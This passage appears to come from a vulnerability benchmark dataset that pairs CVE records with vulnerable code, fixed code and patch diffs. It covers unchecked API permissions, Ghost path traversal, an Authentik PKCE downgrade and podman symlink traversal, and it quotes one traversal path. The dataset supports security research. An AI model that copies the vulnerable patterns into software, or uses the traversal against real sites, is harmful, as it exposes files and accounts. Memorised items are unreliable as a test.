apiv2.notices.get)\n router.put('/api/v2/notices/:id', apiv2Auth, canUser('notices:update'), apiv2.notices.update)\n router.put('/api/v2/notices/:id/activate', apiv2Auth, canUser('notices:activate'), apiv2.notices.activate)\n router.get('/api/v2/notices/clear', apiv2Auth, canUser('notices:deactivate'), apiv2.notices.clear)\n router.delete('/api/v2/notices/:id', apiv2Auth, canUser('notices:delete'), apiv2.notices.delete)\n\n // ElasticSearch\n router.get('/api/v2/es/search', middleware.api, apiv2.elasticsearch.search)\n router.get('/api/v2/es/rebuild', apiv2Auth, isAdmin, apiv2.elasticsearch.rebuild)\n router.get('/api/v2/es/status', apiv2Auth, isAdmin, apiv2.elasticsearch.status)\n\n router.get('/api/v2/mailer/check', apiv2Auth, isAdmin, apiv2.mailer.check)\n}"}], "fix_func": [{"id": "fix_js_183_1", "commit": "889876f", "file_path": "src/controllers/api/v2/routes.js", "start_line": 15, "end_line": 74, "snippet": "module.exports = function (middleware, router, controllers) {\n // Shorten Vars\n const apiv2Auth = middleware.apiv2\n const apiv2 = controllers.api.v2\n const isAdmin = middleware.isAdmin\n const isAgent = middleware.isAgent\n const isAgentOrAdmin = middleware.isAgentOrAdmin\n const canUser = middleware.canUser\n\n // Common\n router.post('/api/v2/login', controllers.api.v2.common.login)\n router.post('/api/v2/token', controllers.api.v2.common.token)\n\n // Accounts\n router.get('/api/v2/accounts', apiv2Auth, canUser('accounts:view'), apiv2.accounts.get)\n router.post('/api/v2/accounts', apiv2Auth, canUser('accounts:create'), apiv2.accounts.create)\n router.put('/api/v2/accounts/:username', canUser('accounts:update'), apiv2Auth, apiv2.accounts.update)\n\n // Tickets\n router.get('/api/v2/tickets', apiv2Auth, canUser('tickets:view'), apiv2.tickets.get)\n router.post('/api/v2/tickets', apiv2Auth, canUser('tickets:create'), apiv2.tickets.create)\n router.post('/api/v2/tickets/transfer/:uid', apiv2Auth, isAdmin, apiv2.tickets.transferToThirdParty)\n router.get('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:view'), apiv2.tickets.single)\n router.put('/api/v2/tickets/batch', apiv2Auth, canUser('tickets:update'), apiv2.tickets.batchUpdate)\n router.put('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:update'), apiv2.tickets.update)\n router.delete('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:delete'), apiv2.tickets.delete)\n router.delete('/api/v2/tickets/deleted/:id', apiv2Auth, isAdmin, apiv2.tickets.permDelete)\n\n // Groups\n router.get('/api/v2/groups', apiv2Auth, apiv2.groups.get)\n router.post('/api/v2/groups', apiv2Auth, canUser('groups:create'), apiv2.groups.create)\n router.put('/api/v2/groups/:id', apiv2Auth, canUser('groups:update'), apiv2.groups.update)\n router.delete('/api/v2/groups/:id', apiv2Auth, canUser('groups:delete'), apiv2.groups.delete)\n\n // Teams\n router.get('/api/v2/teams', apiv2Auth, canUser('teams:view'), apiv2.teams.get)\n router.post('/api/v2/teams', apiv2Auth, canUser('teams:create'), apiv2.teams.create)\n router.put('/api/v2/teams/:id', apiv2Auth, canUser('teams:update'), apiv2.teams.update)\n router.delete('/api/v2/teams/:id', apiv2Auth, canUser('teams:delete'), apiv2.teams.delete)\n\n // Departments\n router.get('/api/v2/departments', apiv2Auth, canUser('departments:view'), apiv2.departments.get)\n router.post('/api/v2/departments', apiv2Auth, canUser('departments:create'), apiv2.departments.create)\n router.put('/api/v2/departments/:id', apiv2Auth, canUser('departments:update'), apiv2.departments.update)\n 
router.delete('/api/v2/departments/:id', apiv2Auth, canUser('departments:delete'), apiv2.departments.delete)\n\n // Notices\n router.get('/api/v2/notices', apiv2Auth, apiv2.notices.get)\n router.put('/api/v2/notices/:id', apiv2Auth, canUser('notices:update'), apiv2.notices.update)\n router.put('/api/v2/notices/:id/activate', apiv2Auth, canUser('notices:activate'), apiv2.notices.activate)\n router.get('/api/v2/notices/clear', apiv2Auth, canUser('notices:deactivate'), apiv2.notices.clear)\n router.delete('/api/v2/notices/:id', apiv2Auth, canUser('notices:delete'), apiv2.notices.delete)\n\n // ElasticSearch\n router.get('/api/v2/es/search', middleware.api, apiv2.elasticsearch.search)\n router.get('/api/v2/es/rebuild', apiv2Auth, isAdmin, apiv2.elasticsearch.rebuild)\n router.get('/api/v2/es/status', apiv2Auth, isAdmin, apiv2.elasticsearch.status)\n\n router.get('/api/v2/mailer/check', apiv2Auth, isAdmin, apiv2.mailer.check)\n}"}], "vul_patch": "--- a/src/controllers/api/v2/routes.js\n+++ b/src/controllers/api/v2/routes.js\n@@ -12,37 +12,37 @@\n router.post('/api/v2/token', controllers.api.v2.common.token)\n \n // Accounts\n- router.get('/api/v2/accounts', apiv2Auth, apiv2.accounts.get)\n- router.post('/api/v2/accounts', apiv2Auth, apiv2.accounts.create)\n- router.put('/api/v2/accounts/:username', apiv2Auth, apiv2.accounts.update)\n+ router.get('/api/v2/accounts', apiv2Auth, canUser('accounts:view'), apiv2.accounts.get)\n+ router.post('/api/v2/accounts', apiv2Auth, canUser('accounts:create'), apiv2.accounts.create)\n+ router.put('/api/v2/accounts/:username', canUser('accounts:update'), apiv2Auth, apiv2.accounts.update)\n \n // Tickets\n- router.get('/api/v2/tickets', apiv2Auth, apiv2.tickets.get)\n- router.post('/api/v2/tickets', apiv2Auth, apiv2.tickets.create)\n+ router.get('/api/v2/tickets', apiv2Auth, canUser('tickets:view'), apiv2.tickets.get)\n+ router.post('/api/v2/tickets', apiv2Auth, canUser('tickets:create'), apiv2.tickets.create)\n router.post('/api/v2/tickets/transfer/:uid', apiv2Auth, isAdmin, apiv2.tickets.transferToThirdParty)\n- router.get('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.single)\n- router.put('/api/v2/tickets/batch', apiv2Auth, apiv2.tickets.batchUpdate)\n- router.put('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.update)\n- router.delete('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.delete)\n+ router.get('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:view'), apiv2.tickets.single)\n+ router.put('/api/v2/tickets/batch', apiv2Auth, canUser('tickets:update'), apiv2.tickets.batchUpdate)\n+ router.put('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:update'), apiv2.tickets.update)\n+ router.delete('/api/v2/tickets/:uid', apiv2Auth, canUser('tickets:delete'), apiv2.tickets.delete)\n router.delete('/api/v2/tickets/deleted/:id', apiv2Auth, isAdmin, apiv2.tickets.permDelete)\n \n // Groups\n router.get('/api/v2/groups', apiv2Auth, apiv2.groups.get)\n- router.post('/api/v2/groups', apiv2Auth, apiv2.groups.create)\n- router.put('/api/v2/groups/:id', apiv2Auth, apiv2.groups.update)\n- router.delete('/api/v2/groups/:id', apiv2Auth, apiv2.groups.delete)\n+ router.post('/api/v2/groups', apiv2Auth, canUser('groups:create'), apiv2.groups.create)\n+ router.put('/api/v2/groups/:id', apiv2Auth, canUser('groups:update'), apiv2.groups.update)\n+ router.delete('/api/v2/groups/:id', apiv2Auth, canUser('groups:delete'), apiv2.groups.delete)\n \n // Teams\n- router.get('/api/v2/teams', apiv2Auth, apiv2.teams.get)\n- router.post('/api/v2/teams', apiv2Auth, 
apiv2.teams.create)\n- router.put('/api/v2/teams/:id', apiv2Auth, apiv2.teams.update)\n- router.delete('/api/v2/teams/:id', apiv2Auth, apiv2.teams.delete)\n+ router.get('/api/v2/teams', apiv2Auth, canUser('teams:view'), apiv2.teams.get)\n+ router.post('/api/v2/teams', apiv2Auth, canUser('teams:create'), apiv2.teams.create)\n+ router.put('/api/v2/teams/:id', apiv2Auth, canUser('teams:update'), apiv2.teams.update)\n+ router.delete('/api/v2/teams/:id', apiv2Auth, canUser('teams:delete'), apiv2.teams.delete)\n \n // Departments\n- router.get('/api/v2/departments', apiv2Auth, apiv2.departments.get)\n- router.post('/api/v2/departments', apiv2Auth, apiv2.departments.create)\n- router.put('/api/v2/departments/:id', apiv2Auth, apiv2.departments.update)\n- router.delete('/api/v2/departments/:id', apiv2Auth, apiv2.departments.delete)\n+ router.get('/api/v2/departments', apiv2Auth, canUser('departments:view'), apiv2.departments.get)\n+ router.post('/api/v2/departments', apiv2Auth, canUser('departments:create'), apiv2.departments.create)\n+ router.put('/api/v2/departments/:id', apiv2Auth, canUser('departments:update'), apiv2.departments.update)\n+ router.delete('/api/v2/departments/:id', apiv2Auth, canUser('departments:delete'), apiv2.departments.delete)\n \n // Notices\n router.get('/api/v2/notices', apiv2Auth, apiv2.notices.get)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-32235", "cve_description": "Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/TryGhost/Ghost", "patch_url": ["https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_290_1", "commit": "c99016fd2fca58eaacbebb9dca6c974aabaa67f6", "file_path": "ghost/core/core/frontend/web/middleware/static-theme.js", "start_line": 17, "end_line": 26, "snippet": "function isAllowedFile(file) {\n const allowedFiles = ['manifest.json'];\n const allowedPath = '/assets/';\n const alwaysDeny = ['.hbs'];\n\n const ext = path.extname(file);\n const base = path.basename(file);\n\n return allowedFiles.includes(base) || (file.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n}"}], "fix_func": [{"id": "fix_js_290_1", "commit": "378dd913aa8d0fd0da29b0ffced8884579598b0f", "file_path": "ghost/core/core/frontend/web/middleware/static-theme.js", "start_line": 40, "end_line": 56, "snippet": "function isAllowedFile(file) {\n const decodedFilePath = decode(file);\n if (decodedFilePath === -1) {\n return false;\n }\n\n const normalizedFilePath = path.normalize(decodedFilePath);\n\n const allowedFiles = ['manifest.json'];\n const allowedPath = '/assets/';\n const alwaysDeny = ['.hbs'];\n\n const ext = 
path.extname(normalizedFilePath);\n const base = path.basename(normalizedFilePath);\n\n return allowedFiles.includes(base) || (normalizedFilePath.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n}"}], "vul_patch": "--- a/ghost/core/core/frontend/web/middleware/static-theme.js\n+++ b/ghost/core/core/frontend/web/middleware/static-theme.js\n@@ -1,10 +1,17 @@\n function isAllowedFile(file) {\n+ const decodedFilePath = decode(file);\n+ if (decodedFilePath === -1) {\n+ return false;\n+ }\n+\n+ const normalizedFilePath = path.normalize(decodedFilePath);\n+\n const allowedFiles = ['manifest.json'];\n const allowedPath = '/assets/';\n const alwaysDeny = ['.hbs'];\n \n- const ext = path.extname(file);\n- const base = path.basename(file);\n+ const ext = path.extname(normalizedFilePath);\n+ const base = path.basename(normalizedFilePath);\n \n- return allowedFiles.includes(base) || (file.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n+ return allowedFiles.includes(base) || (normalizedFilePath.startsWith(allowedPath) && !alwaysDeny.includes(ext));\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-23647", "cve_description": "Authentik is an open-source Identity Provider. There is a bug in our implementation of PKCE that allows an attacker to circumvent the protection that PKCE offers. PKCE adds the code_challenge parameter to the authorization request and adds the code_verifier parameter to the token request. Prior to 2023.8.7 and 2023.10.7, a downgrade scenario is possible: if the attacker removes the code_challenge parameter from the authorization request, authentik will not do the PKCE check. Because of this bug, an attacker can circumvent the protection PKCE offers, such as CSRF attacks and code injection attacks. Versions 2023.8.7 and 2023.10.7 fix the issue.", "cwe_info": {"CWE-287": {"name": "Improper Authentication", "description": "When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct."}}, "repo": "https://github.com/goauthentik/authentik", "patch_url": ["https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_289_1", "commit": "dca8c83", "file_path": "authentik/providers/oauth2/views/token.py", "start_line": 173, "end_line": 247, "snippet": " def __post_init_code(self, raw_code: str, request: HttpRequest):\n if not raw_code:\n LOGGER.warning(\"Missing authorization code\")\n raise TokenError(\"invalid_grant\")\n\n allowed_redirect_urls = self.provider.redirect_uris.split()\n # At this point, no provider should have a blank redirect_uri, in case they do\n # this will check an empty array and raise an error\n try:\n if not any(fullmatch(x, self.redirect_uri) for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (regex comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect URI used by provider\",\n provider=self.provider,\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n except RegexError as exc:\n LOGGER.info(\"Failed to parse regular expression, checking directly\", exc=exc)\n if not any(x == self.redirect_uri for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (strict comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n 
Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect_uri configured\",\n provider=self.provider,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n\n # Check against forbidden schemes\n if urlparse(self.redirect_uri).scheme in FORBIDDEN_URI_SCHEMES:\n raise TokenError(\"invalid_request\")\n\n self.authorization_code = AuthorizationCode.objects.filter(code=raw_code).first()\n if not self.authorization_code:\n LOGGER.warning(\"Code does not exist\", code=raw_code)\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.is_expired:\n LOGGER.warning(\n \"Code is expired\",\n token=raw_code,\n )\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.provider != self.provider or self.authorization_code.is_expired:\n LOGGER.warning(\"Invalid code: invalid client or code has expired\")\n raise TokenError(\"invalid_grant\")\n\n # Validate PKCE parameters.\n if self.authorization_code.code_challenge:\n # Authorization code had PKCE but we didn't get one\n if not self.code_verifier:\n raise TokenError(\"invalid_request\")\n if self.authorization_code.code_challenge_method == PKCE_METHOD_S256:\n new_code_challenge = (\n urlsafe_b64encode(sha256(self.code_verifier.encode(\"ascii\")).digest())\n .decode(\"utf-8\")\n .replace(\"=\", \"\")\n )\n else:\n new_code_challenge = self.code_verifier\n\n if new_code_challenge != self.authorization_code.code_challenge:\n LOGGER.warning(\"Code challenge not matching\")\n raise TokenError(\"invalid_grant\")"}], "fix_func": [{"id": "fix_py_289_1", "commit": "38e04ae12720e5d81b4f7ac77997eb8d1275d31a", "file_path": "authentik/providers/oauth2/views/token.py", "start_line": 173, "end_line": 251, "snippet": " def __post_init_code(self, raw_code: str, request: HttpRequest):\n if not raw_code:\n LOGGER.warning(\"Missing authorization code\")\n raise TokenError(\"invalid_grant\")\n\n allowed_redirect_urls = self.provider.redirect_uris.split()\n # At this point, no provider should have a blank redirect_uri, in case they do\n # this will check an empty array and raise an error\n try:\n if not any(fullmatch(x, self.redirect_uri) for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (regex comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect URI used by provider\",\n provider=self.provider,\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n except RegexError as exc:\n LOGGER.info(\"Failed to parse regular expression, checking directly\", exc=exc)\n if not any(x == self.redirect_uri for x in allowed_redirect_urls):\n LOGGER.warning(\n \"Invalid redirect uri (strict comparison)\",\n redirect_uri=self.redirect_uri,\n expected=allowed_redirect_urls,\n )\n Event.new(\n EventAction.CONFIGURATION_ERROR,\n message=\"Invalid redirect_uri configured\",\n provider=self.provider,\n ).from_http(request)\n raise TokenError(\"invalid_client\")\n\n # Check against forbidden schemes\n if urlparse(self.redirect_uri).scheme in FORBIDDEN_URI_SCHEMES:\n raise TokenError(\"invalid_request\")\n\n self.authorization_code = AuthorizationCode.objects.filter(code=raw_code).first()\n if not self.authorization_code:\n LOGGER.warning(\"Code does not exist\", code=raw_code)\n raise TokenError(\"invalid_grant\")\n\n if self.authorization_code.is_expired:\n LOGGER.warning(\n \"Code is expired\",\n token=raw_code,\n )\n raise 
TokenError(\"invalid_grant\")\n\n if self.authorization_code.provider != self.provider or self.authorization_code.is_expired:\n LOGGER.warning(\"Invalid code: invalid client or code has expired\")\n raise TokenError(\"invalid_grant\")\n\n # Validate PKCE parameters.\n if self.authorization_code.code_challenge:\n # Authorization code had PKCE but we didn't get one\n if not self.code_verifier:\n raise TokenError(\"invalid_grant\")\n if self.authorization_code.code_challenge_method == PKCE_METHOD_S256:\n new_code_challenge = (\n urlsafe_b64encode(sha256(self.code_verifier.encode(\"ascii\")).digest())\n .decode(\"utf-8\")\n .replace(\"=\", \"\")\n )\n else:\n new_code_challenge = self.code_verifier\n\n if new_code_challenge != self.authorization_code.code_challenge:\n LOGGER.warning(\"Code challenge not matching\")\n raise TokenError(\"invalid_grant\")\n # Token request had a code_verifier but code did not have a code challenge\n # Prevent downgrade\n if not self.authorization_code.code_challenge and self.code_verifier:\n raise TokenError(\"invalid_grant\")"}], "vul_patch": "--- a/authentik/providers/oauth2/views/token.py\n+++ b/authentik/providers/oauth2/views/token.py\n@@ -60,7 +60,7 @@\n if self.authorization_code.code_challenge:\n # Authorization code had PKCE but we didn't get one\n if not self.code_verifier:\n- raise TokenError(\"invalid_request\")\n+ raise TokenError(\"invalid_grant\")\n if self.authorization_code.code_challenge_method == PKCE_METHOD_S256:\n new_code_challenge = (\n urlsafe_b64encode(sha256(self.code_verifier.encode(\"ascii\")).digest())\n@@ -73,3 +73,7 @@\n if new_code_challenge != self.authorization_code.code_challenge:\n LOGGER.warning(\"Code challenge not matching\")\n raise TokenError(\"invalid_grant\")\n+ # Token request had a code_verifier but code did not have a code challenge\n+ # Prevent downgrade\n+ if not self.authorization_code.code_challenge and self.code_verifier:\n+ raise TokenError(\"invalid_grant\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10152", "cve_description": "A path traversal vulnerability has been discovered in podman before version 1.4.0 in the way it handles symlinks inside containers. 
An attacker who has compromised an existing container can cause arbitrary files on the host filesystem to be read/written when an administrator tries to copy a file from/to the container.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/containers/libpod", "patch_url": ["https://github.com/containers/libpod/commit/2dcfd3df0b58463b050385c0ccd7929c540bce21"], "programing_language": "Go", "vul_func": [{"id": "vul_go_139_1", "commit": "7358a4c", "file_path": "cmd/podman/cliconfig/create.go", "start_line": 24, "end_line": 27, "snippet": "type CpValues struct {\n\tPodmanCommand\n\tExtract bool\n}"}, {"id": "vul_go_139_2", "commit": "7358a4c", "file_path": "cmd/podman/cp.go", "start_line": 48, "end_line": 55, "snippet": "func init() {\n\tcpCommand.Command = _cpCommand\n\tflags := cpCommand.Flags()\n\tflags.BoolVar(&cpCommand.Extract, \"extract\", false, \"Extract the tar file into the destination directory.\")\n\tcpCommand.SetHelpTemplate(HelpTemplate())\n\tcpCommand.SetUsageTemplate(UsageTemplate())\n\trootCmd.AddCommand(cpCommand.Command)\n}"}, {"id": "vul_go_139_3", "commit": "7358a4c", "file_path": "cmd/podman/cp.go", "start_line": 57, "end_line": 71, "snippet": "func cpCmd(c *cliconfig.CpValues) error {\n\targs := c.InputArgs\n\tif len(args) != 2 {\n\t\treturn errors.Errorf(\"you must provide a source path and a destination path\")\n\t}\n\n\truntime, err := libpodruntime.GetRuntime(getContext(), &c.PodmanCommand)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"could not get runtime\")\n\t}\n\tdefer runtime.Shutdown(false)\n\n\textract := c.Flag(\"extract\").Changed\n\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], extract)\n}"}, {"id": "vul_go_139_4", "commit": "7358a4c", "file_path": "cmd/podman/cp.go", "start_line": 73, "end_line": 158, "snippet": "func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool) error {\n\n\tsrcCtr, srcPath := parsePath(runtime, src)\n\tdestCtr, destPath := parsePath(runtime, dest)\n\n\tif (srcCtr == nil && destCtr == nil) || (srcCtr != nil && destCtr != nil) {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must use just one container\", src, dest)\n\t}\n\n\tif len(srcPath) == 0 || len(destPath) == 0 {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must specify paths\", src, dest)\n\t}\n\tctr := srcCtr\n\tisFromHostToCtr := (ctr == nil)\n\tif isFromHostToCtr {\n\t\tctr = destCtr\n\t}\n\n\tmountPoint, err := ctr.Mount()\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer ctr.Unmount(false)\n\tuser, err := getUser(mountPoint, ctr.User())\n\tif err != nil {\n\t\treturn err\n\t}\n\tidMappingOpts, err := ctr.IDMappings()\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting IDMappingOptions\")\n\t}\n\tcontainerOwner := idtools.IDPair{UID: int(user.UID), GID: int(user.GID)}\n\thostUID, hostGID, err := util.GetHostIDs(convertIDMap(idMappingOpts.UIDMap), convertIDMap(idMappingOpts.GIDMap), user.UID, user.GID)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thostOwner := idtools.IDPair{UID: int(hostUID), GID: int(hostGID)}\n\n\tvar glob 
[]string\n\tif isFromHostToCtr {\n\t\tif filepath.IsAbs(destPath) {\n\t\t\tdestPath = filepath.Join(mountPoint, destPath)\n\n\t\t} else {\n\t\t\tif err = idtools.MkdirAllAndChownNew(filepath.Join(mountPoint, ctr.WorkingDir()), 0755, hostOwner); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"error creating directory %q\", destPath)\n\t\t\t}\n\t\t\tdestPath = filepath.Join(mountPoint, ctr.WorkingDir(), destPath)\n\t\t}\n\t} else {\n\t\tif filepath.IsAbs(srcPath) {\n\t\t\tsrcPath = filepath.Join(mountPoint, srcPath)\n\t\t} else {\n\t\t\tsrcPath = filepath.Join(mountPoint, ctr.WorkingDir(), srcPath)\n\t\t}\n\t}\n\tglob, err = filepath.Glob(srcPath)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"invalid glob %q\", srcPath)\n\t}\n\tif len(glob) == 0 {\n\t\tglob = append(glob, srcPath)\n\t}\n\tif !filepath.IsAbs(destPath) {\n\t\tdir, err := os.Getwd()\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"err getting current working directory\")\n\t\t}\n\t\tdestPath = filepath.Join(dir, destPath)\n\t}\n\n\tvar lastError error\n\tfor _, src := range glob {\n\t\tif src == \"-\" {\n\t\t\tsrc = os.Stdin.Name()\n\t\t\textract = true\n\t\t}\n\t\terr := copy(src, destPath, dest, idMappingOpts, &containerOwner, extract, isFromHostToCtr)\n\t\tif lastError != nil {\n\t\t\tlogrus.Error(lastError)\n\t\t}\n\t\tlastError = err\n\t}\n\treturn lastError\n}"}], "fix_func": [{"id": "fix_go_139_1", "commit": "2dcfd3d", "file_path": "cmd/podman/cliconfig/create.go", "start_line": 24, "end_line": 28, "snippet": "type CpValues struct {\n\tPodmanCommand\n\tExtract bool\n\tPause bool\n}"}, {"id": "fix_go_139_2", "commit": "2dcfd3d", "file_path": "cmd/podman/cp.go", "start_line": 50, "end_line": 58, "snippet": "func init() {\n\tcpCommand.Command = _cpCommand\n\tflags := cpCommand.Flags()\n\tflags.BoolVar(&cpCommand.Extract, \"extract\", false, \"Extract the tar file into the destination directory.\")\n\tflags.BoolVar(&cpCommand.Pause, \"pause\", true, \"Pause the container while copying\")\n\tcpCommand.SetHelpTemplate(HelpTemplate())\n\tcpCommand.SetUsageTemplate(UsageTemplate())\n\trootCmd.AddCommand(cpCommand.Command)\n}"}, {"id": "fix_go_139_3", "commit": "2dcfd3d", "file_path": "cmd/podman/cp.go", "start_line": 60, "end_line": 73, "snippet": "func cpCmd(c *cliconfig.CpValues) error {\n\targs := c.InputArgs\n\tif len(args) != 2 {\n\t\treturn errors.Errorf(\"you must provide a source path and a destination path\")\n\t}\n\n\truntime, err := libpodruntime.GetRuntime(getContext(), &c.PodmanCommand)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"could not get runtime\")\n\t}\n\tdefer runtime.Shutdown(false)\n\n\treturn copyBetweenHostAndContainer(runtime, args[0], args[1], c.Extract, c.Pause)\n}"}, {"id": "fix_go_139_4", "commit": "2dcfd3d", "file_path": "cmd/podman/cp.go", "start_line": 75, "end_line": 211, "snippet": "func copyBetweenHostAndContainer(runtime *libpod.Runtime, src string, dest string, extract bool, pause bool) error {\n\n\tsrcCtr, srcPath := parsePath(runtime, src)\n\tdestCtr, destPath := parsePath(runtime, dest)\n\n\tif (srcCtr == nil && destCtr == nil) || (srcCtr != nil && destCtr != nil) {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must use just one container\", src, dest)\n\t}\n\n\tif len(srcPath) == 0 || len(destPath) == 0 {\n\t\treturn errors.Errorf(\"invalid arguments %s, %s you must specify paths\", src, dest)\n\t}\n\tctr := srcCtr\n\tisFromHostToCtr := (ctr == nil)\n\tif isFromHostToCtr {\n\t\tctr = destCtr\n\t}\n\n\tmountPoint, err := ctr.Mount()\n\tif err != nil 
{\n\t\treturn err\n\t}\n\tdefer ctr.Unmount(false)\n\n\t// We can't pause rootless containers.\n\tif pause && rootless.IsRootless() {\n\t\tstate, err := ctr.State()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif state == libpod.ContainerStateRunning {\n\t\t\treturn errors.Errorf(\"cannot copy into running rootless container with pause set - pass --pause=false to force copying\")\n\t\t}\n\t}\n\n\tif pause && !rootless.IsRootless() {\n\t\tif err := ctr.Pause(); err != nil {\n\t\t\t// An invalid state error is fine.\n\t\t\t// The container isn't running or is already paused.\n\t\t\t// TODO: We can potentially start the container while\n\t\t\t// the copy is running, which still allows a race where\n\t\t\t// malicious code could mess with the symlink.\n\t\t\tif errors.Cause(err) != libpod.ErrCtrStateInvalid {\n\t\t\t\treturn err\n\t\t\t}\n\t\t} else if err == nil {\n\t\t\t// Only add the defer if we actually paused\n\t\t\tdefer func() {\n\t\t\t\tif err := ctr.Unpause(); err != nil {\n\t\t\t\t\tlogrus.Errorf(\"Error unpausing container after copying: %v\", err)\n\t\t\t\t}\n\t\t\t}()\n\t\t}\n\t}\n\n\tuser, err := getUser(mountPoint, ctr.User())\n\tif err != nil {\n\t\treturn err\n\t}\n\tidMappingOpts, err := ctr.IDMappings()\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting IDMappingOptions\")\n\t}\n\tcontainerOwner := idtools.IDPair{UID: int(user.UID), GID: int(user.GID)}\n\thostUID, hostGID, err := util.GetHostIDs(convertIDMap(idMappingOpts.UIDMap), convertIDMap(idMappingOpts.GIDMap), user.UID, user.GID)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thostOwner := idtools.IDPair{UID: int(hostUID), GID: int(hostGID)}\n\n\tvar glob []string\n\tif isFromHostToCtr {\n\t\tif filepath.IsAbs(destPath) {\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, destPath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdestPath = cleanedPath\n\t\t} else {\n\t\t\tctrWorkDir, err := securejoin.SecureJoin(mountPoint, ctr.WorkingDir())\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif err = idtools.MkdirAllAndChownNew(ctrWorkDir, 0755, hostOwner); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"error creating directory %q\", destPath)\n\t\t\t}\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), destPath))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdestPath = cleanedPath\n\t\t}\n\t} else {\n\t\tif filepath.IsAbs(srcPath) {\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, srcPath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsrcPath = cleanedPath\n\t\t} else {\n\t\t\tcleanedPath, err := securejoin.SecureJoin(mountPoint, filepath.Join(ctr.WorkingDir(), srcPath))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsrcPath = cleanedPath\n\t\t}\n\t}\n\tglob, err = filepath.Glob(srcPath)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"invalid glob %q\", srcPath)\n\t}\n\tif len(glob) == 0 {\n\t\tglob = append(glob, srcPath)\n\t}\n\tif !filepath.IsAbs(destPath) {\n\t\tdir, err := os.Getwd()\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"err getting current working directory\")\n\t\t}\n\t\tdestPath = filepath.Join(dir, destPath)\n\t}\n\n\tvar lastError error\n\tfor _, src := range glob {\n\t\tif src == \"-\" {\n\t\t\tsrc = os.Stdin.Name()\n\t\t\textract = true\n\t\t}\n\t\terr := copy(src, destPath, dest, idMappingOpts, &containerOwner, extract, 